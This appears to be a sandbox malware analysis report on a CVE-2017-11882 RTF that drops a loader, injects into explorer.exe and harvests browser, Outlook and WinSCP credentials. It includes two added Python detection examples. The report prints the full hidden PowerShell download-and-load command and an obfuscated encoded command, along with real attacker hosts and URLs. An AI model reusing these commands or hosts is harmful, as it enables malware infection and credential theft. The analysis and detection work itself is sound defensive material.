            Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'j? ? ? ? ?bp? ? ? ? ?g0? ? ? ? ?yqbn? ? ? ? ?gu? ? ? ? ?vqby? ? ? ? ?gw? ? ? ? ?i? ? ? ? ?? ? ? ? ?9? ? ? ? ?c? ? ? ? ?? ? ? ? ?jwbo? ? ? ? ?hq? ? ? ? ?d? ? ? ? ?bw? ? ? ? ?hm? ? ? ? ?og? ? ? ? ?v? ? ? ? ?c8? ? ? ? ?aqbh? ? ? ? ?dg? ? ? ? ?m? ? ? ? ?? ? ? ? ?z? ? ? ? ?de? ? ? ? ?m? ? ? ? ?? ? ? ? ?0? ? ? ? ?c4? ? ? ? ?dqbz? ? ? ? ?c4? ? ? ? ?yqby? ? ? ? ?gm? ? ? ? ?a? ? ? ? ?bp? ? ? ? ?hy? ? ? ? ?zq? ? ? ? ?u? ? ? ? ?g8? ? ? ? ?cgbn? ? ? ? ?c8? ? ? ? ?mg? ? ? ? ?3? ? ? ? ?c8? ? ? ? ?aqb0? ? ? ? ?gu? ? ? ? ?bqbz? ? ? ? ?c8? ? ? ? ?dgbi? ? ? ? ?hm? ? ? ? ?xw? ? ? ? ?y? ? ? ? ?d? ? ? ? ?? ? ? ? ?mg? ? ? ? ?0? ? ? ? ?d? ? ? ? ?? ? ? ? ?nw? ? ? ? ?y? ? ? ? ?dy? ? ? ? ?xw? ? ? ? ?y? ? ? ? ?d? ? ? ? ?? ? ? ? ?mg? ? ? ? ?0? ? ? ? ?d? ? ? ? ?? ? ? ? ?nw? ? ? ? ?y? ? ? ? ?dy? ? ? ? ?lwb2? ? ? ? ?gi? ? ? ? ?cw? ? ? ? ?u? ? ? ? ?go? ? ? ? ?c? ? ? ? ?bn? ? ? ? ?cc? ? ? ? ?ow? ? ? ? ?k? ? ? ? ?hc? ? ? ? ?zqbi? ? ? ? ?em? ? ? ? ?b? ? ? ? ?bp? ? ? ? ?gu? ? ? ? ?bgb0? ? ? ? ?c? ? ? ? ?? ? ? ? ?pq? ? ? ? ?g? ? ? ? ?e4? ? ? ? ?zqb3? ? ? ? ?c0? ? ? ? ?twbi? ? ? ? ?go? ? ? ? ?zqbj? ? ? ? ?hq? ? ? ? ?i? ? ? ? ?bt? ? ? ? ?hk? ? ? ? ?cwb0? ? ? ? ?gu? ? ? ? ?bq? ? ? ? ?u? ? ? ? ?e4? ? ? ? ?zqb0? ? ? ? ?c4? ? ? ? ?vwbl? ? ? ? ?gi? ? ? ? ?qwbs? ? ? ? ?gk? ? ? ? ?zqbu? ? ? ? ?hq? ? ? ? ?ow? ? ? ? ?k? ? ? ? ?gk? ? ? ? ?bqbh? ? ? ? ?gc? ? ? ? ?zqbc? ? ? ? ?hk? ? ? ? ?d? ? ? ? ?bl? ? ? ? ?hm? ? ? ? ?i? ? ? ? ?? ? ? ? ?9? ? ? ? ?c? ? ? ? ?? ? ? ? ?j? ? ? ? ?b3? ? ? ? ?gu? ? ? ? ?ygbd? ? ? ? ?gw? ? ? ? ?aqbl? ? ? ? ?g4? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?eq? ? ? ? ?bwb3? ? ? ? ?g4? ? ? ? ?b? ? ? ? ?bv? ? ? ? ?ge? ? ? ? ?z? ? ? ? ?be? ? ? ? ?ge? ? ? ? ?d? ? ? ? ?bh? ? ? ? ?cg? ? ? ? ?j? ? ? ? ?bp? ? ? ? ?g0? ? ? ? ?yqbn? ? ? ? ?gu? ? ? ? ?vqby? ? ? ? ?gw? ? ? ? ?kq? ? ? ? ?7? ? ? ? ?cq? ? ? ? ?aqbt? ? ? ? ?ge? ? ? ? ?zwbl? ? ? ? ?fq? ? ? ? ?zqb4? ? ? ? ?hq? ? ? ? ?i? ? ? ? ?? ? ? ? ?9? ? ? ? ?c? ? ? ? ?? ? ? ? ?wwbt? ? ? ? ?hk? ? ? ? ?cwb0? ? ? ? ?gu? ? ? ? ?bq? ? ? ? ?u? ? ? ? ?fq? ? ? ? ?zqb4? ? ? ? ?hq? ? ? ? ?lgbf? ? ? ? ?g4? ? ? ? ?ywbv? ? ? ? ?gq? ? ? ? ?aqbu? ? ? ? ?gc? ? ? ? ?xq? ? ? ? ?6? ? ? ? ?do? ? ? ? ?vqbu? ? ? ? ?ey? ? ? ? ?o? ? ? ? ?? ? ? ? ?u? ? ? ? ?ec? ? ? ? ?zqb0? ? ? ? ?fm? ? ? ? ?d? ? ? ? ?by? ? ? ? ?gk? ? ? ? ?bgbn? ? ? ? ?cg? ? ? ? ?j? ? ? ? ?bp? ? ? ? ?g0? ? ? ? ?yqbn? ? ? ? ?gu? ? ? ? ?qgb5? ? ? ? ?hq? ? ? ? ?zqbz? ? ? ? ?ck? ? ? ? ?ow? ? ? ? ?k? ? ? ? ?hm? ? ? ? ?d? ? ? ? ?bh? ? ? ? ?hi? ? ? ? ?d? ? ? ? ?bg? ? ? ? ?gw? ? ? ? ?yqbn? ? ? ? ?c? ? ? ? ?? ? ? ? ?pq? ? ? ? ?g? ? ? ? ?cc? ? ? ? ?p? ? ? ? ?? ? ? ? ?8? ? ? ? ?ei? ? ? ? ?qqbt? ? ? ? ?eu? ? ? ? ?ng? ? ? ? ?0? ? ? ? ?f8? ? ? ? ?uwbu? ? ? ? ?ee? ? ? ? ?ugbu? ? ? ? ?d4? ? ? ? ?pg? ? ? ? ?n? ? ? ? ?ds? ? ? ? ?j? ? ? ? ?bl? ? ? ? ?g4? ? ? ? ?z? ? ? ? ?bg? ? ? ? ?gw? ? ? ? ?yqbn? ? ? ? ?c? ? ? ? ?? ? ? ? ?pq? ? ? ? ?g? ? ? ? ?cc? ? ? ? ?p? ? ? ? ?? ? ? ? ?8? ? ? ? ?e
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "$imageurl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webclient = new-object system.net.webclient;$imagebytes = $webclient.downloaddata($imageurl);$imagetext = [system.text.encoding]::utf8.getstring($imagebytes);$startflag = '<<base64_start>>';$endflag = '<<base64_end>>';$startindex = $imagetext.indexof($startflag);$endindex = $imagetext.indexof($endflag);$startindex -ge 0 -and $endindex -gt $startindex;$startindex += $startflag.length;$base64length = $endindex - $startindex;$base64command = $imagetext.substring($startindex, $base64length);$commandbytes = [system.convert]::frombase64string($base64command);$loadedassembly = [system.reflection.assembly]::load($commandbytes);$type = $loadedassembly.gettype('dnlib.io.home');$method = $type.getmethod('vai').invoke($null, [object[]] ('txt.vfew/09/61.841.49.32//:ptth' , 'desativado' , 'desativado' , 'desativado','regasm',''))"
            Source: explorer.exe, 0000000C.00000002.628664936.00000000001D6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.374687564.00000000001D6000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Progman-
            Source: explorer.exe, 0000000C.00000002.629305688.0000000000720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000C.00000000.374758061.0000000000720000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Program Manager
            Source: explorer.exe, 0000000C.00000002.629305688.0000000000720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000C.00000000.374758061.0000000000720000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
            Source: explorer.exe, 0000000C.00000002.629305688.0000000000720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000C.00000000.374758061.0000000000720000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: !Progman
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 19_2_001155EB cpuid 19_2_001155EB
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
            Source: C:\Users\user\AppData\Roaming\gwseuha | Queries volume information: C:\Users\user\AppData\Roaming\gwseuha VolumeInformation
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 19_2_000C2112 GetSystemTimeAsFileTime,_alldiv,wsprintfA,19_2_000C2112
            Source: C:\Windows\explorer.exe | Code function: 12_2_02803490 GetUserNameW,12_2_02803490
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 19_2_000C2198 RtlZeroMemory,GetVersionExW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,RtlCompareMemory,RtlCompareMemory,StrStrIW,FreeLibrary,19_2_000C2198
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

            Stealing of Sensitive Information

            Every file, registry and directory access in this section comes from C:\Windows\SysWOW64\explorer.exe, the 32-bit copy of Explorer that the injected code runs in; the user's shell on this 64-bit system is C:\Windows\explorer.exe. A 32-bit explorer.exe reading browser, mail and SFTP-client credential stores is itself the indicator, independent of the Yara matches.

            Source: Yara match; File source: 00000019.00000002.628348956.0000000000061000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000018.00000002.628416578.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: Process Memory Space: explorer.exe PID: 2840, type: MEMORYSTR
            Source: Yara match; File source: Process Memory Space: explorer.exe PID: 2836, type: MEMORYSTR
            Source: Yara match; File source: 7.2.powershell.exe.2878da8.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match; File source: 10.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match; File source: 0000000C.00000002.629839810.0000000002801000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 0000000A.00000002.376080124.00000000000C1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 0000000A.00000002.376068215.00000000000A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: C:\Windows\SysWOW64\explorer.exe; Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl (the vendor key under which WinSCP keeps its saved sessions)
            Source: C:\Windows\SysWOW64\explorer.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data (Chrome saved passwords)
            Source: C:\Windows\SysWOW64\explorer.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data (Chrome autofill and saved payment data)
            Source: C:\Windows\SysWOW64\explorer.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies (Chrome session cookies)
            Source: C:\Windows\SysWOW64\explorer.exe; Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 (Outlook MAPI profile, which holds mail account settings and stored credentials)
            Source: C:\Windows\SysWOW64\explorer.exe; Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
            Source: C:\Windows\SysWOW64\explorer.exe; Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002
            Source: C:\Windows\SysWOW64\explorer.exe; Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
            Source: C:\Windows\SysWOW64\explorer.exe; Directory queried: C:\Users\user\Documents
            Source: C:\Windows\SysWOW64\explorer.exe; Directory queried: C:\Users\user\Documents
            Source: C:\Windows\SysWOW64\explorer.exe; Directory queried: C:\Users\user\Documents\BPMLNOBVSB
            Source: C:\Windows\SysWOW64\explorer.exe; Directory queried: C:\Users\user\Documents\BPMLNOBVSB
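An added example, not code from the report or from Joe Sandbox: a small parser for behaviour lines in the form used in this section ("Source: <process><Action>: <target>", with the trailing "Jump to behavior" link text stripped), plus a check that flags credential-store access by a process that does not own the store. The sample lines are copied from the list above, with one constructed benign line for chrome.exe reading its own cookie store; the store markers and the list of owning processes are my assumptions, not something the report states.

```python
"""Flag credential-store access by processes that have no business there.

Added example, not part of the Joe Sandbox report. SAMPLE_LINES are excerpts
from the "Stealing of Sensitive Information" list above plus one constructed
benign chrome.exe line; STORES (marker substrings and owning processes) are my
own assumptions.
"""
import ntpath
import re

# "Source: <process><Action>: <target>[Jump to behavior]" as the report renders it.
LINE_RE = re.compile(
    r"^Source: (?P<proc>.+?\.exe)"
    r"(?P<action>Key opened|File opened|Directory queried): "
    r"(?P<target>.+?)(?:Jump to behavior)?$"
)

# (store name, lowercase marker found in the target path or key, processes allowed to read it)
STORES = [
    ("chrome_profile", r"\google\chrome\user data\default", {"chrome.exe"}),
    ("winscp_sessions", r"\software\martin prikryl", {"winscp.exe"}),
    ("outlook_profile", r"\windows messaging subsystem\profiles", {"outlook.exe"}),
]

SAMPLE_LINES = [
    # Excerpts from the report above (this explorer.exe is the injected 32-bit copy).
    r"Source: C:\Windows\SysWOW64\explorer.exeKey opened: HKEY_CURRENT_USER\Software\Martin PrikrylJump to behavior",
    r"Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior",
    r"Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior",
    r"Source: C:\Windows\SysWOW64\explorer.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior",
    r"Source: C:\Windows\SysWOW64\explorer.exeDirectory queried: C:\Users\user\Documents",
    # Constructed benign line: the browser itself reading its own cookie store.
    r"Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior",
]


def parse_lines(lines):
    """Return one dict (proc, action, target) per line that matches the report format."""
    parsed = []
    for line in lines:
        m = LINE_RE.match(line.strip())
        if m:
            parsed.append(m.groupdict())
    return parsed


def flag_credential_access(lines):
    """Return (store, process) pairs where the reading process is not the store's owner."""
    hits = []
    for ev in parse_lines(lines):
        target = ev["target"].lower()
        reader = ntpath.basename(ev["proc"]).lower()
        for store, marker, allowed in STORES:
            if marker in target and reader not in allowed:
                hits.append((store, ev["proc"]))
    return hits


if __name__ == "__main__":
    for store, proc in flag_credential_access(SAMPLE_LINES):
        print(f"{store:16} read by {proc}")
```

The owner list is deliberately a whitelist rather than a blacklist of known stealers: the report shows the reads coming from a trusted binary name (explorer.exe), so matching on the reader's name alone would miss it.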

            Remote Access Functionality

            Source: Yara match; File source: 00000019.00000002.628348956.0000000000061000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000018.00000002.628416578.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: Process Memory Space: explorer.exe PID: 2840, type: MEMORYSTR
            Source: Yara match; File source: Process Memory Space: explorer.exe PID: 2836, type: MEMORYSTR
            Source: Yara match; File source: 7.2.powershell.exe.2878da8.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match; File source: 10.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match; File source: 0000000C.00000002.629839810.0000000002801000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 0000000A.00000002.376080124.00000000000C1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 0000000A.00000002.376068215.00000000000A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            MITRE ATT&CK Matrix

            The original renders this as a 14-column grid (Reconnaissance, Resource Development, Initial Access, Execution, Persistence, Privilege Escalation, Defense Evasion, Credential Access, Discovery, Lateral Movement, Collection, Command and Control, Exfiltration, Impact) padded with unflagged techniques. Only the techniques the report flagged are listed here, grouped by the column they appear in, with the numeric badge shown beside each technique exactly as the report prints it.

            Execution: 11 Native API; 53 Exploitation for Client Execution; 111 Command and Scripting Interpreter; 3 PowerShell
            Scripting: 111 (the report places this legacy technique in its Resource Development and Persistence columns)
            Persistence: 1 DLL Side-Loading
            Privilege Escalation: 1 DLL Side-Loading; 623 Process Injection
            Defense Evasion: 1 Disable or Modify Tools; 1 Deobfuscate/Decode Files or Information; 2 Obfuscated Files or Information; 1 Install Root Certificate; 1 DLL Side-Loading; 1 File Deletion; 11 Masquerading; 1 Modify Registry; 141 Virtualization/Sandbox Evasion; 623 Process Injection; 1 Hidden Files and Directories
            Credential Access: 1 OS Credential Dumping; 11 Input Capture; 1 Credentials in Registry
            Discovery: 1 System Time Discovery; 1 Account Discovery; 13 File and Directory Discovery; 127 System Information Discovery; 431 Security Software Discovery; 141 Virtualization/Sandbox Evasion; 13 Process Discovery; 1 Application Window Discovery; 1 System Owner/User Discovery; 1 Remote System Discovery
            Collection: 1 Archive Collected Data; 11 Data from Local System; 1 Email Collection; 11 Input Capture
            Command and Control: 4 Ingress Tool Transfer; 21 Encrypted Channel; 4 Non-Application Layer Protocol; 115 Application Layer Protocol
            Reconnaissance, Initial Access, Lateral Movement, Exfiltration, Impact: no techniques flagged

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            Behavior Graph (ID 1502248; sample SecuriteInfo.com.Exploit.CV...; start date 31/08/2024; architecture WINDOWS; score 100)

            Top-level signatures: Multi AV Scanner detection for domain / URL; Suricata IDS alerts for network traffic; Found malware configuration; 18 other signatures.

            The rendered graph flattens to the following process tree (children indented under their parent; network endpoints, dropped files and signatures listed under the process that produced them):

            WINWORD.EXE
              EQNEDT32.EXE (two instances)
                Network: 23.94.148.16, ports 49163, 49165, 80 (AS-COLOCROSSINGUS, United States)
                Dropped: C:\...\verynicebuttersmoothcakeicream.vBs (Unicode)
                Signatures: Office equation editor establishes network connection; Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
                wscript.exe
                  Signatures: Suspicious powershell command line found; Wscript starts Powershell (via cmd or directly); Very long command line found; 3 other signatures
                  powershell.exe
                    Signatures: Suspicious powershell command line found; Suspicious execution chain found
                    powershell.exe
                      Network: ia803104.us.archive.org 207.241.232.154, ports 443, 49164 (INTERNET-ARCHIVEUS, United States)
                      Signatures: Installs new ROOT certificates; Writes to foreign memory regions; Injects a PE file into a foreign processes
                      RegAsm.exe (three instances)
                        Signatures (first instance): Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)); Maps a DLL or memory area into another process; Checks if the current machine is a virtual machine (disk enumeration); Creates a thread in another existing process (thread injection)
                        Signatures (second instance): Switches to a custom stack to bypass stack traces
                        explorer.exe (injected by the first RegAsm.exe)
                          Network: prolinice.ga 185.251.91.119, ports 49166, 49167, 49168 (SPRINTHOSTRU, Russian Federation)
                          Dropped: C:\Users\user\AppData\Roaming\gwseuha (PE32)
                          Signatures: System process connects to network (likely due to code injection or exploit); Benign windows process drops PE files; Injects code into the Windows Explorer (explorer.exe); 2 other signatures
                          explorer.exe (three listed children plus 6 other processes)
                            Network: prolinice.ga
                            Signatures: System process connects to network (likely due to code injection or exploit); Found evasive API chain (may stop execution after checking mutex); Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc); 4 other signatures
            taskeng.exe
              gwseuha (the dropped payload, relaunched by the Task Scheduler engine)
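An added example, not part of the report: parent/child rules that catch the execution chain the behaviour graph above describes, run over constructed Sysmon-style process-creation records. The events, the rule names and the file paths are mine and mirror the reported tree (WINWORD to EQNEDT32 to wscript to powershell to RegAsm to an injected explorer.exe, and taskeng to gwseuha); EQNEDT32.EXE is recorded with svchost.exe as its parent because Office starts the equation editor through DCOM, which is why the rule keys on what the editor spawns rather than on who spawned it.

```python
"""Parent/child detection rules for the delivery chain in the behaviour graph.

Added example, not part of the Joe Sandbox report. SAMPLE_EVENTS are constructed
Sysmon-style process-creation records modelled on the reported process tree;
the rule names, RULES and the paths are my own assumptions.
"""
import ntpath

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}
# .NET framework utilities that are commonly abused as hosts for injected payloads.
DOTNET_HOSTS = {"regasm.exe", "regsvcs.exe", "installutil.exe", "msbuild.exe"}

SAMPLE_EVENTS = [  # constructed; pid/parent/image only, the fields the rules need
    {"pid": 100, "parent": r"C:\Windows\explorer.exe", "image": r"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE"},
    {"pid": 101, "parent": r"C:\Windows\System32\svchost.exe", "image": r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE"},
    {"pid": 102, "parent": r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE", "image": r"C:\Windows\SysWOW64\wscript.exe"},
    {"pid": 103, "parent": r"C:\Windows\SysWOW64\wscript.exe", "image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"},
    {"pid": 104, "parent": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe", "image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"},
    {"pid": 105, "parent": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe", "image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"},
    {"pid": 106, "parent": r"C:\Windows\explorer.exe", "image": r"C:\Windows\SysWOW64\explorer.exe"},
    {"pid": 107, "parent": r"C:\Windows\System32\taskeng.exe", "image": r"C:\Users\user\AppData\Roaming\gwseuha"},
    {"pid": 108, "parent": r"C:\Windows\System32\userinit.exe", "image": r"C:\Windows\explorer.exe"},
]


def _name(path):
    return ntpath.basename(path).lower()


def rule_equation_editor_child(ev):
    # The equation editor has no legitimate reason to start any child process.
    return _name(ev["parent"]) == "eqnedt32.exe"


def rule_script_host_to_powershell(ev):
    return _name(ev["parent"]) in SCRIPT_HOSTS and _name(ev["image"]) == "powershell.exe"


def rule_powershell_to_dotnet_host(ev):
    return _name(ev["parent"]) == "powershell.exe" and _name(ev["image"]) in DOTNET_HOSTS


def rule_wow64_explorer(ev):
    # On 64-bit Windows the user's shell is C:\Windows\explorer.exe; the 32-bit copy
    # under SysWOW64 is the process the injected SmokeLoader code lives in.
    return ev["image"].lower() == r"c:\windows\syswow64\explorer.exe"


def rule_extensionless_in_appdata(ev):
    img = ev["image"].lower()
    return r"\appdata\roaming" in img and ntpath.splitext(img)[1] == ""


RULES = {
    "equation_editor_spawned_child": rule_equation_editor_child,
    "script_host_spawned_powershell": rule_script_host_to_powershell,
    "powershell_spawned_dotnet_host": rule_powershell_to_dotnet_host,
    "wow64_explorer_started": rule_wow64_explorer,
    "extensionless_binary_in_appdata": rule_extensionless_in_appdata,
}

# The three stages that together make up the document-to-injector delivery chain.
DELIVERY_CHAIN = {
    "equation_editor_spawned_child",
    "script_host_spawned_powershell",
    "powershell_spawned_dotnet_host",
}


def evaluate(events):
    """Return (rule name, pid) for every event that trips a rule."""
    findings = []
    for ev in events:
        for name, rule in RULES.items():
            if rule(ev):
                findings.append((name, ev["pid"]))
    return findings


def full_chain_present(findings):
    """True when every stage of the delivery chain was seen, not just one."""
    return DELIVERY_CHAIN <= {name for name, _ in findings}


if __name__ == "__main__":
    found = evaluate(SAMPLE_EVENTS)
    for name, pid in found:
        print(f"pid {pid}: {name}")
    print("full delivery chain:", full_chain_present(found))
```

Each rule fires on one link of the chain, so a single hit is worth triage on its own; the chain check exists because the three delivery-stage rules firing together on one host leaves little room for a benign explanation.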

            Antivirus detection, submitted sample
            Source | Detection | Scanner | Label
            SecuriteInfo.com.Exploit.CVE-2017-11882.123.12869.5405.rtf | 50% | Virustotal |
            SecuriteInfo.com.Exploit.CVE-2017-11882.123.12869.5405.rtf | 50% | ReversingLabs | Document-RTF.Exploit.CVE-2017-11882
            SecuriteInfo.com.Exploit.CVE-2017-11882.123.12869.5405.rtf | 100% | Avira | HEUR/Rtf.Malformed

            Antivirus detection, dropped files
            Source | Detection | Scanner | Label
            C:\Users\user\AppData\Roaming\gwseuha | 0% | ReversingLabs |
            C:\Users\user\AppData\Roaming\gwseuha | 0% | Virustotal |

            Antivirus detection, unpacked PE files
            No Antivirus matches

            Antivirus detection, domains
            Source | Detection | Scanner | Label
            ia803104.us.archive.org | 1% | Virustotal |
            prolinice.ga | 16% | Virustotal |

            Antivirus detection, URLs (URLs are reproduced as extracted from memory, including trailing bytes such as "crl0" or "BB74")
            Source | Detection | Scanner | Label
            https://duckduckgo.com/chrome_newtab | 0% | URL Reputation | safe
            http://nuget.org/NuGet.exe | 0% | URL Reputation | safe
            https://duckduckgo.com/ac/?q= | 0% | URL Reputation | safe
            http://crl.entrust.net/server1.crl0 | 0% | URL Reputation | safe
            http://ocsp.entrust.net03 | 0% | URL Reputation | safe
            https://contoso.com/License | 0% | URL Reputation | safe
            https://contoso.com/Icon | 0% | URL Reputation | safe
            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | 0% | URL Reputation | safe
            http://www.diginotar.nl/cps/pkioverheid0 | 0% | URL Reputation | safe
            https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search | 0% | URL Reputation | safe
            https://ac.ecosia.org/autocomplete?q= | 0% | URL Reputation | safe
            https://contoso.com/ | 0% | URL Reputation | safe
            https://nuget.org/nuget.exe | 0% | URL Reputation | safe
            https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg | 100% | URL Reputation | malware
            http://go.microsoft.c | 0% | URL Reputation | safe
            https://support.mozilla.org | 0% | URL Reputation | safe
            http://ocsp.entrust.net0D | 0% | URL Reputation | safe
            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe
            https://secure.comodo.com/CPS0 | 0% | URL Reputation | safe
            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | 0% | URL Reputation | safe
            http://crl.entrust.net/2048ca.crl0 | 0% | URL Reputation | safe
            http://prolinice.ga/ndex.php | 0% | Avira URL Cloud | safe
            http://www.piriform.com/ccleanerxe | 0% | Avira URL Cloud | safe
            Http://prolinice.ga/index.phpBB74 | 0% | Avira URL Cloud | safe
            http://prolinice.ga/ | 0% | Avira URL Cloud | safe
            https://ia803104.us.archive.org | 0% | Avira URL Cloud | safe
            http://wehtwifahcxeheu.com/ | 0% | Avira URL Cloud | safe
            http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0 | 0% | Avira URL Cloud | safe
            https://ia803104.us.archive.org | 1% | Virustotal |
            http://23.94.148.16/90/verynicebuttersmoothcakeicream.tIFj | 0% | Avira URL Cloud | safe
            https://www.google.com/favicon.ico | 0% | Avira URL Cloud | safe
            http://java.sun.com | 0% | Avira URL Cloud | safe
            https://www.google.com/favicon.ico | 0% | Virustotal |
            http://23.94.148.16/90/verynicebuttersmoothcakeicream.tIF | 100% | Avira URL Cloud | malware
            http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0 | 0% | Virustotal |
            http://23.94.148.16/90/verynicebuttersmoothcakeicream.tIFj | 1% | Virustotal |
            http://crl.pkioverheid.nl/DomOvLatestCRL.crl0 | 0% | Avira URL Cloud | safe
            http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv | 0% | Avira URL Cloud | safe
            http://prolinice.ga/application/x-www-form-urlencodedMozilla/5.0 | 0% | Avira URL Cloud | safe
            http://prolinice.ga/ | 16% | Virustotal |
            http://prolinice.ga/ndex.php | 1% | Virustotal |
            http://23.94.148.16/90/verynicebuttersmoothcakeicream.tIF | 1% | Virustotal |
            http://crl.pkioverheid.nl/DomOvLatestCRL.crl0 | 0% | Virustotal |
            http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv | 0% | Virustotal |
            http://java.sun.com | 0% | Virustotal |
            http://23.94.148.16 | 0% | Avira URL Cloud | safe
            http://www.piriform.com/ccleaner | 0% | Avira URL Cloud | safe
            http://prolinice.ga/application/x-www-form-urlencodedMozilla/5.0 | 1% | Virustotal |
